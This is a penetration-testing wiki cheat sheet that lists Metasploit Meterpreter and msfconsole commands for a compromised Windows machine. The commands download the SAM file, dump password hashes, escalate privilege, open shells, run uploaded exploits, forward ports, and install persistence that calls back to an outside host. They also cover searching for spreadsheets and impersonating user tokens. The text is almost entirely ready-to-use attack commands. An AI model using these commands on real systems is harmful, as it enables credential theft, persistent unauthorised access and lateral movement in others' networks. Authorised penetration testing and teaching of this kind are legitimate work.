Metasploit Meterpreter Cheat Sheet

Penetration Testing Wiki

Useful commands with Meterpreter:

Meterpreter upload file to Windows target:

meterpreter> upload file c:\\windows

Meterpreter download file from Windows target:

meterpreter> download c:\\windows\\repair\\sam /tmp

Meterpreter run .exe on target – handy for executing uploaded exploits:

meterpreter> execute -f c:\\windows\\temp\\exploit.exe

Creates new channel with cmd shell:

meterpreter> execute -f cmd -c

Meterpreter show processes:

meterpreter> ps

Meterpreter get shell on the target:

meterpreter> shell

Meterpreter attempts priviledge escalation the target:

meterpreter> getsystem

Meterpreter attempts to dump the hashes on the target:

meterpreter> hashdump
meterpreter> credcollect

Meterpreter create port forward to target machine:

meterpreter> portfwd add –l 3389 –p 3389 –r $IP

Meterpreter delete port forward:

meterpreter> portfwd delete –l 3389 –p 3389 –r $IP

Search excel files on target machine:

meterpreter> search -f *.xlsx

Get user id:

meterpreter> getuid

Check whether arch == meterpreter or migrate to x64 process!!

meterpreter> sysinfo

Identify other machines that the supplied domain user has administrative access to

msf> run post/windows/gather/local_admin_search_enum
msf> connect $TARGET $PORT

Uses SSL:

msf> connect -s $TARGET $PORT

Starts ruby shell:

msf> irb

Integrations with other tools:

msf> load pcap, wmap, nessus
msf> db_hosts
msf> db_vulns
msf> db_exploited

Meterpreter persistence mode

meterpreter> run persistence -U -i 5 -p 443 -r $IP

Impersonate any user

meterpreter> use incognito
meterpreter> list_tokens -u
meterpreter> impersonate_token MACHINE\\user
meterpreter> drop_token